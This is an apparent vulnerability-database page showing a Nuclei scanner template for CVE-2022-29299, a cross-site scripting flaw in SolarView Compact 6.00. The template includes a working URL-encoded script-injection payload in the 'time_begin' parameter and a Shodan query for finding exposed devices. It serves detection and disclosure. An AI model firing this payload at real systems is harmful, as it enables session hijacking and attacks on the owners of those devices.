Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-29299
HistoryJun 15, 2022 - 5:03 p.m.

SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting

2022-06-1517:03:09
ProjectDiscovery
github.com
2

5.8 Medium

AI Score

Confidence

High

0.002 Low

EPSS

Percentile

54.1%

SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'time_begin' parameter to Solar_History.php.
id: CVE-2022-29299

info:
  name: SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting
  author: For3stCo1d
  severity: medium
  description: |
    SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'time_begin' parameter to Solar_History.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
  reference:
    - https://www.exploit-db.com/exploits/50967
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29299
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cve-id: CVE-2022-29299
    epss-score: 0.00175
    epss-percentile: 0.53704
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.favicon.hash:-244067125
  tags: cve2022,cve,xss,solarview,edb

http:
  - method: GET
    path:
      - '{{BaseURL}}/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script><"">'
          - '/Solar_History.php" METHOD="post">'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220673dc09a9e66945d3637df5b363f262144bea056b46b6df86841bfd376ae1c290221008cbc66ea88991d111c727cdec2f06797a521103da95bc92272406df8e87890a5:922c64590222798bb761d5b6d8e72950

5.8 Medium

AI Score

Confidence

High

0.002 Low

EPSS

Percentile

54.1%

Related for NUCLEI:CVE-2022-29299